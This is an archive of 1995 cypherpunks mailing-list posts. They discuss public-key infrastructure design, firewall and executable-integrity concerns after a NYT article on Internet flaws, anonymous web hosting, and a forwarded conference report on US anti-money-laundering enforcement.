  message. "Knowing the author" is the sense of the signature, not just
  having the signature. "Knowing" means know enough attributes about
  him. Same with encryption.

  Knowledge of the author may, of course, be quite bizarre, as well as
  the author itself. But security is always in context of some
  knowledge about the other side. 

  It doesn't make much sense to communicate with a
  "smith@somewhere.edu", because this is not enough information to get
  sufficient knowledge of the key owner. There are a lot of people
  named smith being able to legally have this address. And it doesn't
  make sense to communicate with Bob, "Bob" or ISP+Bob, as long as the
  name Bob is not sufficient to provide enough information.

  I need to be able to get any knowledge about the key owner that
  could be a reason to be interested in communicating with him. I
  do not want to talk with bob because he is one of many Bobs. I want
  to talk with him because he is the Bob with phone number 123, red
  hair and living in XY street. 

  Therefore, a certificate must be able to provide any information
  that could be required for the decision whether the key owner will
  be accepted as a communication partner.

  Obviously, the informations depend on the nature of the key owner
  (human, machine, committee etc.)

- Under normal circumstances communication has an originator and
  in most cases an addressee. If you can talk to an addressee, you usually
  have some kind of address to locate him. But perhaps you don't have
  more than the address, not even a public key. Thus the address to
  communicate should also be good to locate the public key of the
  addressee (or the keys of all key owners listening on that address).

  Therefore, the communication address should be enough to locate a
  key server and to retrieve the key (or a small number of possible
  keys) for that address. After retrieving the keys, the originator of
  communication can decide whether there is a key sufficiently
  identifying his communication partner.

  Consequently, the key certificate should contain the communication
  address of the owner. It is helpfull if the address is unique.

  For a human this may be the email address. For a machine it may be
  the DNS host name or the internet adress. For a service (WWW-site)
  or an organization it may be the email address.

  The communication address must allow to locate the key server. The
  only existing infrastructure allowing this in internet is the
  DNS. If you have an email address, hostname or IP address, you can
  find the appropriate DNS server. The server should be able to help
  you. Best way to do this is to provide the address of a key
  retrieval system (similar to the MX record).

  Use the communication address of the key owner as a searchable index
  for the key.

  Inventing a MD5 hash sum as key index is useless and doesn't make
  sense in my eyes. It just creates the problem of knowing the index
  and typo errors.

- A MITM between two communication partners can be avoided by
  apropriate protocols as long as there is a sufficient key management
  structure.

- A MITM between a key owner and the certification authority is a
  problem, but a solvable one.

  I don't like the separation of creating the key and attaching
  attributes. The MITM can attack between. There is always the
  problem of managing all attached attributes. When the first
  attribute is attached to the key, the key doesn't have any other
  attributes. This make it vulnerable.

  It is better to combine the key and its attributes _before_ creation of the
  key. If the attributes are not attached, but an essential part of
  the key, there is no hole for the MITM. If key and certification are
  two things, there is the problem of bringing them
  together. Self-certified keys don't have this problem. (RFC 1824)

- There is also question whether the key attributes can be trusted to
  describe the real key owner well enough. This implies that someone
  must check the attributes and participate in attaching the attribute
  or creating the self-certified key. PGP uses key signatures to do
  so, but there is not much information attached, just
  name/e-mail-address. 

  As said before there might be interest in describing the key owner
  in other ways. The authority signing the key must be able to check
  the description of the key owner. An unorganized web of trust (trust
  in what? signator knows key owner?) isn't suitable. One reason is
  that there is much too much overhead in finding a path of trust in
  the web and storing or retrieving the keys while searching for the
  path.

  There must be a systematic, hierarchical organization of authorities
  which check the key attributes. (We call them SKIA : Secure Key
  Issuing Authority, see RFC 1824).



So I would suggest the following:

We create a hierarchy of SKIAs able to check certain
attributes. E.g. hostnames and IP addresses might be checked by the
same authorities which allow to use them. 

Key attributes are a composition of the communication addresses of the
key owner and his natural attributes a communication partner might be
interested in while identifying the peer. 

Key owner and SKIA create a combination of key and attributes.

The key owner deposits his key on all key servers responsible for his
comm. addresses.

If you communicate with someone known at least by his communication
address (otherwise you couldn't communicate), you can easily retrieve
all possible public keys of all key owners able to use this
address. Now you can decide and choose the key with appropriate
attributes (bank account number or whatever).

Any comments?

Hadmut



  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Wed, 11 Oct 95 21:04:51 PDT
To: herbs@interlog.com
Subject: Re: Basic Flaws in Internet Security and Commerce
Message-ID: <9510120401.AA15785@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> So: If you can't trust your path to your own file system, what can you
> trust?  (And this is without even talking about things like firmware
> upgrades and BIOS patches and all sorts of other potential approaches.)  Can
> we do no better than simply assume the local workstation file system can be
> trusted?
> 

Nah, it's not as bad as all that.  There's fixes to all of this, they're well
known, and actually in place at some places.  Because it's such a pain having
good security on all of the machines most sites choose to have really good
security on a firewall to keep the bad guys out, and through policy, isolation,
and less stringent security measures protect the machines inside the firewall.
That's not to say that everyone with a firewall has good security, far from it.
It's also not to say that everyone without a firewall is vulnerable, they're
not...I know folks with all of their machines buttoned up tight.  It's possible
to close most categories of holes, and to detect intrusions in progress.  You
say you're worried about the system being corrupted so that you can't trust
calls to the OS.  Some attacks do work this way, but you can prevent the attack
via a combination of good security and good practices.  And yes, secure 
authentication and transmission of data makes everything much simpler;)  Without
it you have to essentially pull up the drawbridge and trust no one outside the
moat, since there's no way of knowing if anyone, or any host is who or what they
say they are.  If anyone wants more specific information about how to protect
from various attacks I can help or give you references to the literature, but
I won't go into it here since I expect that most anyone you'd find on cypher-
punks knows all this at least in outline already.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 11 Oct 95 21:22:47 PDT
To: nelson@santafe.edu (Nelson Minar)
Subject: Re: anonymous web pages?
In-Reply-To: <199510120018.SAA12399@nelson.santafe.edu>
Message-ID: <199510120417.VAA29572@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	c2.org allows people to setup anonymous web pages.
http://www.c2.org/services/

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 11 Oct 95 21:25:37 PDT
To: rkw@dataplex.net (Richard Wackerbarth)
Subject: Re: anonymous web pages?
In-Reply-To: <v02130500aca22166f237@[199.183.109.242]>
Message-ID: <199510120420.VAA29755@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	What's so hard about finding a site to host anon web pages?
c2.org's been doing it for over a year. had the CoS threaten to sue us
over it, even.

> 
> At 7:18 PM 10/11/95, Nelson Minar wrote:
> >The hard part would be finding a site that would be willing to serve
> >anonymous pages. I don't understand the politics at various sites that
> >allow anonymous remailers: maybe this isn't much harder?
> 
> Yes, it is "much harder". Unless the site had a cache of all the pages that
> it was willing to source (the usual case), traffic analysis could easily be
> applied to determine the sources for pages because, unlike mail which is
> "store and forward", web pages are provided on a realtime connection.
> 
> ----
> Richard Wackerbarth
> rkw@dataplex.net
> 
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 11 Oct 95 21:26:50 PDT
To: dvberger@eit.COM (David Berger)
Subject: Re: NYT on Internet Flaws
In-Reply-To: <199510120159.SAA27558@viper.eit.com>
Message-ID: <199510120421.VAA29813@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> Nonwithstanding, the NY Times writer took an otherwise reasonable point and
> blew it up into a "War of the Worlds" style article.  I'd make sure he
> writes a decent article before quoting me in it.
> 

	Not possible. Reporters don't call you for a quote and then
send you a draft of the article for your approval before they
publish. They call for a quote, write their article, and publish, not
asking for approval.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 11 Oct 95 21:31:40 PDT
To: rsalz@osf.org (Rich Salz)
Subject: Re: NYT on Internet Flaws
In-Reply-To: <9510120410.AA28665@sulphur.osf.org>
Message-ID: <199510120426.VAA00261@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> NO!
> 
> Something like Perry's "Do not redistribute without permission" should
> be the only modification needed.

	"should" is very different from what is.
	Hell, -no- change "should" be necessary. Reporters "should" be
aware of the issues and write good articles. But they don't. Some "Do
not redistribute w/o permission" isn't going to stop a reporter from
printing an article about your post, if they think it will get them
the front page and a raise.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Wed, 11 Oct 95 18:40:45 PDT
To: cypherpunks@toad.com
Subject: Noise: Re: CJR for perl-RSA t-shirt
In-Reply-To: <199510120047.KAA13489@sweeney.cs.monash.edu.au>
Message-ID: <Pine.3.89.9510112155.A49472-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 12 Oct 1995, Jiri Baum wrote:

> 
> Perhaps somebody should make IDEA shorts?
> 
> Then it would be interoperable with PGP...
> (Would tooooo. You just have to remember what the header is.)

You'd still need an MD5 necktie.

(and your matching stealth sunglasses? When does this go too far?
This ridiculous looking figure is begging for its own worlds chat avatar.
Violate ITAR and good fashion in vr. Which begs the question, would anyone
notice if First Cypherpunks Bank were operating in such a networked video 
game? Now *that* would be a non-bank financial institution. I can just 
see it in court: "your honor, the disclaimer clearly says it is all a game,
the state's agents have simply suspended all disbelief". Talk about stego.)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an215712@anon.penet.fi
Date: Wed, 11 Oct 95 15:55:53 PDT
To: cypherpunks@toad.com
Subject: international clampdown on money laundering
Message-ID: <9510112227.AA25400@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



 ----- Forwarded Message

Date: Tue, 10 Oct 1995 23:35:58 -0400 (EDT)
From: Brad Dolan <bdolan@use.usit.net>
To: snet-l@world.std.com
Subject: Int'l Money Laundering, Part the Second (fwd)



- ---------- Forwarded message ----------
Date: Tue, 10 Oct 1995 19:31:40 -0800
Subject: Int'l Money Laundering, Part the Second


INTERNATIONAL ASPECTS
The increasingly long arm of US law

Those of you who have read my earlier exploration on the subject
of jurisdiction (http://www.communities.com/paper/swamp.html)
should be aware of a wide variety of ways that the US can "reach
out and touch someone" they're not pleased with.

Well, last week, I learned a few more.

There are several ways in which the US is attempting to exert
hegemony throughout the world wrt banking regulation:

  o Identification of "fiscally tolerant" nations and banking
    havens, and close regulatory examination of all transactions
    with these countries.

  o Pressure on major US trading partners and allies to pass
    and implement anti-money-laundering legislation and
    regulatory regimes.

  o Regulations on foreign banks with offices in the US, making
    compliance demands on world-wide operations.

  o Criminal prosecution of banks suspected of institutional
    involvement in money laundering, even if said bank has no
    offices or branches in the US.

  o Worldwide pre-trial substitute asset forfeiture of banks
    suspected of institutional involvement in money laundering,
    even if said bank has no offices or branches in the US.


Pariah Nations in Banking
=========================

As I touched on briefly in the previous section, transactions
with well-known banking havens can automatically qualify as
"suspicious." And in addition to some of the better known havens,
a number of countries were pointed out at the conference as
being "fiscally tolerant", including Malta, Uruguay, Japan,
Ireland and Belgium; in another presentation the countries of
Eastern Europe and the former Soviet Union were identified as
"rapidly growing" sources of suspicious baning activity.

Transactions with counterparties in such countries will be flagged
by regulators for closer examination -- banks with large percentages
of transactions with these countries will be expected to meet a
higher standard in their attempt to identify "suspicious" behavior
and will be under increasing pressure to investigate their customers'
business practicies and motivation for all bank transactions.

Some countries are clearly going to continue to tell the US to
"get stuffed." However, if the US is successful in pressuring more
and more countries to "tow the line", it will leave a shrinking
pool of transactions subject to closer and closer examination.


New Money Laundering Legislation
================================

Two presentations, one from Taiwan, the other from Thailand,
focused on new or proposed legislation wrt money laundering in
those countries. Based on my direct experience of living in the
former, and my reseach into the latter, it's going to be a very,
very long time before such legislation has a significant
impact on either country.

Chinese people (who are in the majority in Taiwan, and form
an economically active minority in Thailand) are very cash-
oriented; I vividly remember payday in Taiwan, with the boss
sitting at a table piled with money, bundling up salaries for
everyone. I'd come home at the end of each month with a giant
wad of cash from my several different jobs. One could hardly
imagine a better environment for money laundering than a society
in which large quantities of cash change hands on a regular basis.
After his talk, the Taiwanese speaker acknowledged the problems,
but seemed hopeful that progress could be made.

The speaker from Thailand, Nualnoi Treerat, a professor of
Economics, discussed the proposed legislation primarily as an
attempt to reduce the impact of organized crime on
political life and society in Thailand; however, by her own
estimations, the underground economy in Thailand represents
17-19% of the country's GDP (mostly drugs and prostitution.)
Given the extensive corruption which she also detailed, it
seems that such legislation will be a very small step indeed.

Other speakers addressed the issue of cultural differences
with respect to the use of cash and attitudes towards privacy,
and it came up at lunch both days -- in many cultures, financial
privacy is held in much higher regard than in the US, and people
have a  much stronger suspicion towards the government. Furthermore,
there are many people who feel this way in the US. There is going
to be an inevitable clash between atttempts to closely regulate
and monitor money movements and people's fundamental desire for
privacy. It's not clear that people of any culture can be sufficiently
frightend by the bad guys to give up as much of their privacy as
would be required for ultimate success in the War on Money Laundering.

Despite the dim chances of success, it's clear that the US has
been at least partially successful in coercing and coaxing other
countries to adopt measures against money laundering, and to
some extent there is local support for these measures. But these
direct efforts pale by comparison to some other techniques...


Foreign Bank Regulation
=======================

In various pro-privacy publications I've read, there have been
oblique warnings about doing business with foreign banks that
maintain offices in the US. At this conference, I learned some
very concrete reasons for this.

It turns out that if a foreign bank wants to open a US office,
they must demonstrate compliance with US money laundering laws
throughout their _worldwide operations_. Furthermore, they're
expected to have solid leadership for these policies from their
home offices.

This puts such banks in a serious bind. For instance, while
Annunzio-Wylie absolves (or attempts to absolve) banks from civil
liability for filing Suspicious Activity Reports and Criminal
Referral Forms on their cusomters, this absolution does not extend
to the home countries of these banks, where substantially different
laws may obtain -- possibly explicitly forbidding this kind of
reporting.

There is almost a certain kind of logic to this kind of activity,
but not content to extend our laws over the worldwide operations
of banks with US offices, there are two ways in which US authorities
are now attempting to extend US laws to banks _with no US offices_.


Extraterritorial Reach
======================

The best paper presented at the conference, hands down, was
"Surviving the Solution: The Extraterritorial Reach of the
United States," by Kirk Munroe, a criminal defense attorney
practicing in Miami. [I intend to find out if an online
version of this paper can be made available.]

To quote Mr. Munroe:

  The US money laundering law specifically provides for
  extraterritorial jurisdiction when (a) the conduct is by a US
  citizen anywhere in the world, or, if by a non-US citizen,
  the conduct occurs, at least in part, in the United States,
  and (b) the transactions, or a series of related transactions,
  exceeds $10,000. [18 USC $ 1956(f)]

Some add'l background: banks involved in international business
typically have a number of _correspondent accounts_ scattered
around the world that are used for clearing wire transfers and
other transactions. Since the BCCI scandal, the US government
has increasingly gone after these accounts when a bank is
suspected of facilitating money laundering.

Furthermore, banks can have these correspondent accounts seized,
even if they no longer contain "dirty" money, because they
_facilitated_ a money laundering activity.

When you combine these elements, you get a strategy that
permits the US government to confiscate worldwide correspondent
accounts of banks, even if they don't have a US presence.

The first case Mr. Munroe cites is that of Banco de Occidente
(Panama), one of his clients, that was alleged to have facilitated
the laundering of the proceeds of drug transactions. The indictment
included criminal charges against the banks and a criminal
forfeiture charge. The government also filed a civil action for
the forfeiture of $412 million allegedly laundered (although it
had already passed completely through the bank.)

The government then proceded to freeze not only the bank's US
correspondent accounts, but also accounts in Germany, Switzerland
and Canada, leading to the insolvency of the bank and its subsequent
takeover by the Panamanian Banking Commission. [The Germans quickly
unfroze the account after a civil action brought by the bank.]

Quoting Munroe:

  After months of difficult and complicated negotiations which
  involved the banks' various interests in eight nations, a
  resolution was reached with the governments of the US, Canada,
  and Switzerland... [the bank] entered a guilty plea and agreed
  to forfeit, over a period of four years, $5 million to the US.
  The US, in turn, paid the Swiss and the Canadians $1 million
  each from the initial $2 million forfeiture payment.

[Those of you who are still under any delusions about the "safety"
of Swiss bank accounts, take careful note of this.]

Mr. Munroe concludes that the only reason that the bank got off
this "lightly" was because of substantial evidence that it was,
by and large, a highly respectable institution and that this
instance of laundering was an aberration.

The next case cited by Mr. Munroe is that of Bank Leu. I quote
from his paper:

  In sum, a Luxembourg bank with no office in the US was charged
  and convicted of money laundering in the US on the basis of
  clearing US dollar negotiable instruments drawn on a US bank but
  deposited by non-US citizens in Luxembourg. In other words,
  acceptance of US-dollar negotiable instruments by a bank anywhere
  in the world outside of the US renders the bank susceptible
  to US criminal jurisdiction in the money laundering field.

The case boils down to this: Bank Leu wanted to expand its private
banking business, and hired an officer to market accounts in
South America. Two related accounts were opened, and over a one-
year period $2.3 million in cashier's checks, all below $10K,
were deposited in the two accounts.

Although no guilty knowledge could be shown, this case was pursued
and won on a theory of "willful blindness", that is, the bank "should
have known" that the transactions had no valid business purpose
and were inherently suspicious (came via Columbia, were sometimes
more than 6 months old, all in small amounts, etc.). According to a
LEA representative at the conference, there was a lot of joking in
the backoffice at Bank Leu about the money being dirty, and clerks
were repeatedly told "don't worry, it's ok" by bank officers.
Certainly if this is true, it amounts to _extremely_ willful
blindness, but this case still represents an amazingly long reach
for US laws.

[more to come... "Things bad people do with money"]





--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 11 Oct 95 22:41:47 PDT
To: jirib@cs.monash.edu.au
Subject: Re: Noise: Re: CJR for perl-RSA t-shirt
In-Reply-To: <199510120509.PAA14542@sweeney.cs.monash.edu.au>
Message-ID: <Pine.SOL.3.91.951011223447.25554A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Oct 1995, Jiri Baum wrote:

> 
> If you are reading a signed message, you simply strip off the

Not a good choice of words - remember, you should never expose your 
private, er, key...

Simon
---
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1)   ((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@cynico.com>
Date: Wed, 11 Oct 95 20:43:29 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on Internet Flaws
In-Reply-To: <307C4D2F.150B@netscape.com>
Message-ID: <Pine.BSD.3.91.951011223850.13193B-100000@miso.wwa.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 11 Oct 1995, Jeff Weinstein wrote:

> > I'd love to see something in there about most commercial sites being behind
> > firewalls without nfs access across the firewall.  This greatly reduces the
> > risk from the nfs problems.  If you get your binary via nfs from a trusted
> > host inaccessible from the internet, then if you have this problem management
> > can handle it as an employee problem;)  There are ways to make secure
> > firewalls, it's fairly well understood.  Sometimes people point to things
> > like the hack Mitnick did last Christmas, but his attack took advantage of
> > a couple of things a security expert shouldn't have allowed, first and
> > foremost two machines were accesible from the internet, and one of them
> > trusted root logins from the other without a password:(
> 
>   It might also be worth noting that people accessing the net
> via an ISP from home do not typically use NFS either.

	And that this is the segment of the user population that is most 
important to commerce online.  But I still hate to see these types of 
solutions being used to try and cover something that should, and could be 
fixed in the underlying protocol itself.  Wouldnt AH and ESP take care of 
a large portion of the existing security holes?  Certainly not all of 
them, but it would solve alot of problems and make development of secure 
applications much easier.

note: is anyone working on implementeing some of the things outlines in 
R(1825?) ?  I think Perry posted regarding it awhile back, but havent 
heard much about it since.

Nesta Stubbs		     "Betsy, can you find the Pentagon for me? 
Cynico Network Consulting     It has five sides and a big parking lot" 
nesta@cynico.com			-Fred McMurray-





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Wed, 11 Oct 95 20:08:17 PDT
To: jirib@cs.monash.edu.au
Subject: Re: Elementrix Press Release
In-Reply-To: <199510120222.MAA13959@sweeney.cs.monash.edu.au>
Message-ID: <Pine.3.89.9510112226.A75036-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 12 Oct 1995, Jiri Baum wrote:

> Still, who knows what surprises QM can provide?
> 
> In which case calling it a "telepathic key exchange scheme" might
> be quite appropriate :-)

I don't think that's what was meant. After all, using telepathy as a 
secure channel, you'd still need a comm protocol. The last time I checked
protocols and algorithms are one and the same. Since elementrix doesn't use
algorithms, we shouldn't defame them by claiming they've invented secure
telepathy.        

Now wouldn't that be interesting to patent?
(One wonders if elementrix employees occasionally indulge in guilty 
glances at Knuth and Sedgewick without their bosses' knowledge.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 11 Oct 95 20:28:36 PDT
To: cypherpunks@toad.com
Subject: variations on an attack
Message-ID: <199510120326.XAA10502@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Jiri Baum wrote:
 
> To start a new sub-thread: what if the man in the middle is actually
> a behaviour-modifying parasite? At that stage even a physical meeting
> won't do you much good (the parasite may be otherwise asymptomatic).
 
That wouldn't quite work since the host would notice the parasite in the
middle and could then work out countermeasures.  An important part of a
MITM attack is escaping notice.
 
What if one night the man in the middle drugged you, kidnapped you, placed
you inside a virtual reality machine, replaced your body with a clone, and
established a link between the VR machine and the clone so that you
experience everything the clone experiences and the clone does everything
you intend to do?  Can you prove this has not already happened?

 - the Mad Scientist in the Middle

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMHyIA9IjPOsOWLIJAQE3AgP/bNcA0BmDMvto9SocpIcYImoXJ72k9k+Z
gYH6dnCo5UCY0KbKwgCbBfQI0bxpaP7EWmZPS/i1HdzWvKOw9JExY2i0gvKMr/BS
KGtlG0+RAVSU9DiVRuAr6d7x6IQKYOeRgcNz0Dm2JpaA1eo/DbJ3tsRBYCeaQQ26
gS5XzNzL00M=
=lc/J
- -----END PGP SIGNATURE-----

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzB8hz8AAAEEAKuHA58RXNk5o0nlDTOsoAs3YTKubscQYoW3kLSjmn7gmskD
NtPKxYvXveGN3D/eBgsMzdGVtrl46j1r6VjYsTMcDGUL9wGQnflgHGrbReFYGzkI
yW7GhyeUoRqCdmACDpmzUxEqp2J5hK2obL8bcvoiVSBMFogabdIjPOsOWLIJAAUT
tEJJIHdvdWxkIGxpa2UgdG8gYmUgcmVmZXJlZCB0byBhcyAidGhlIE1hZCBTY2ll
bnRpc3QgaW4gdGhlIE1pZGRsZSI=
=Lzd5
- -----END PGP PUBLIC KEY BLOCK-----



- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMHyK9SoZzwIn1bdtAQHNsgF/WqMLd/EuNEG3QEXZobZKDQDl0hjMmhBn
56pUQxkNYi0ckMx+YIij9X7XoExm3MsK
=D+xl
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 11 Oct 95 21:13:30 PDT
To: sameer@c2.org
Subject: Re: NYT on Internet Flaws
Message-ID: <9510120410.AA28665@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>        I understand though, that we can't control what the reporters
>say and how they interpret what we say. It is very important to word
>your posts carefully such that when you post a bug a reporter won't
>think that they should write an article on it until it is verified.

NO!

Something like Perry's "Do not redistribute without permission" should
be the only modification needed.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <klp@gold.tc.umn.edu>
Date: Wed, 11 Oct 95 22:36:24 PDT
To: sameer@c2.org (sameer)
Subject: Re: NYT on Internet Flaws
In-Reply-To: <199510120347.UAA27336@infinity.c2.org>
Message-ID: <307ca9244fa4002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


According to rumor, sameer said:
> 
> 	I completely agree that the reporters on this list make things
> very difficult and people do need to be very careful about posting
> things which will get misinterpreated by reporters.. but--
> 
> 	This list is -not- an "announcement" list. If I see a
> potential bug, I want other cypherpunks to tell me whether I am onto
> something or not, so I would post. If some idiot reporter takes that
> and writes an article saying "XXX has a hole" that is -EXTREMELY BAD
> REPORTING-.

It's the "information wants to be free" mindset meeting the "I've got
an hour till deadline and my house payment is due, and if I get 
scooped again I'm out of a job" mentality. (Apologies to the reporters
on the list who work hard to develop stories, and do a good job for
the most part).

What is happening is two different systems are interfacing, and 
the "bad reporting" we see are just translation errors. In the 
many to many system on the net, there is information flowing both
ways, and knowledge is additive. In traditional media, it's a one
way flow, and a "story" is often a one shot information transaction,
with little opportunity built into the paradigm to expand or 
correct the information once it is sent.

Will the interface get better? My hope is that it will, because as 
more and more people get involved in the net, the audience for
traditional media will become more aware of inaccuracies, and 
poor information will be less saleable than it is currently.


-- 
Kevin Prigge                        |  Holes in whats left of my reason, 
CIS Consultant                      |  holes in the knees of my blues,
Computer & Information Services     |  odds against me been increasin' 
email: klp@cis.umn.edu              |  but I'll pull through...  



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Wed, 11 Oct 95 21:46:56 PDT
To: cypherpunks@toad.com
Subject: Re: SAIC bought ... [NOISE]
Message-ID: <v02120d03aca20e7c3442@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 7:27 PM 10/11/95, Alan Horowitz wrote:

>I used to work for SAIC. It's a legitimate beltway-bandito contractor. To
>call it a cover op is sort of missing a point. The government hardly ever
>does _anything_ itself (as, say, percentage of budget). Contractors are
>the ones who do the dirty work in the trenches.

        It's not missing the point at all; what I find particularly
alarming is this half-measure situation we increasingly find ourselves in,
wherein the state farms out the drudgery of being a state but reserves to
itself the prerogative to govern by obscure fiat. Institutions like SAIC
aren't accountable in a way that gov't agencies at least theoretically are,
yet the continuing existence of those agencies amidst this move toward
privatization perpetuates this increasingly mythical idea of
"accountability." If everything's going to go private, fine, whatever,
let's make a go of it, and no one can tell me what software I can/can't use
and how much I can/can't deposit, etc.; OTOH, if the USG wants to reserve
the right to tell me what I can and can't do in these regards, then it had
bloody well better submit to the "responsibility" that goes with that
"right": accountability to the electorate.
        Why do you think the spooks make such prodigious use of cutouts? In
part because it's an effective way of evading detection; and,
unfortunately, oversight is a subset of detection. I'm sure SAIC does tons
of perfectly legitimate contract work--but I'm equally sure that it does
tons of covert work. And far too much covert work is covert for no other
reason than it's stupid (read my lips: "exploding giant clams") or--in the
case at hand--something that a rapidly growing sector of the electorate
rightly regards with suspicion.

Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald M. Kitchen" <don@cs.byu.edu>
Date: Wed, 11 Oct 95 23:49:58 PDT
To: cypherpunks@toad.com
Subject: Cypherpunks Moderated: Avoid This Thread
Message-ID: <199510120649.AAA04389@bert.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Anon wrote:

>"According to the group's moderator, who prefers to remain anonymous,
> `The most important means to the defense of privacy is encryption.
> Cypherpunks are therefore devoted to cryptography.  They wish to learn
> about it, to teach it and to implement it.'"
>
>Ok, since when is the Cypherpunk's mailing list moderated?

Ummm, anyone seen L.D. lately? 

Just wondering.

Don




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 12 Oct 95 02:23:33 PDT
To: Paul A Gauthier <gauthier@CS.Berkeley.EDU>
Subject: Re: NYT on Internet Flaws
In-Reply-To: <199510120005.RAA01681@moosehead.CS.Berkeley.EDU>
Message-ID: <307CD9F9.36CE@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Paul A Gauthier wrote:
> 
> >
> > Patrick Horgan wrote:
> > >
> > > > From: "K. M. Ellis" <kelli@zeus.towson.edu>
> > > >
> > > I'd love to see something in there about most commercial sites being behind
> > > firewalls without nfs access across the firewall.  This greatly reduces the
> >
> >   It might also be worth noting that people accessing the net
> > via an ISP from home do not typically use NFS either.
> >
> 
> They don't often have the skill/knowledge/concern to verify a PGP checksum
> to ensure someone didn't patch their browser, either.

  I don't believe that my posting of PGP signed checksums last night
is a final solution that will make the world safe for all end users.
I'm rather insulted that you imply that I do.  If you read Markoff's
article, you will see that we have stated that we are working on
a more global solution.

> People seem to miss that the NFS hack was only an _example_ of a powerful
> way to silently destroy the integrity of an executable. Spoofing the
> insecure FTP session they used to retrieve it works. Sending them a random
> trojan horse works. The point was not that NFS is insecure. It was that
> unless you can authenticate your executables as being trustworthy NOTHING
> ELSE MATTERS.
> 
> SSL, good RNGs for session key selection, etc, are all null
> and void if you run (any) untrusted software that patches
> your Netscape executable, for example, or if you got a bum copy to
> start with.

  I think everyone agrees that if you don't check the bits you
get from an insecure FTP session, or if you let a bad guy write to
your disk, then you may be in trouble.  The point is that you and a
few reporters are running around yelling at the top of your lungs
that internet commerce is totally doomed because it is possible for
users to infect their systems with viruses.  In the case of
Netscape, users who are worried about their binary being infected
during downloading could actually buy the product, either in their
local computer store or from us directly.

  Perhaps you have a solution to offer to this whole problem?

	--Jeff

-- 
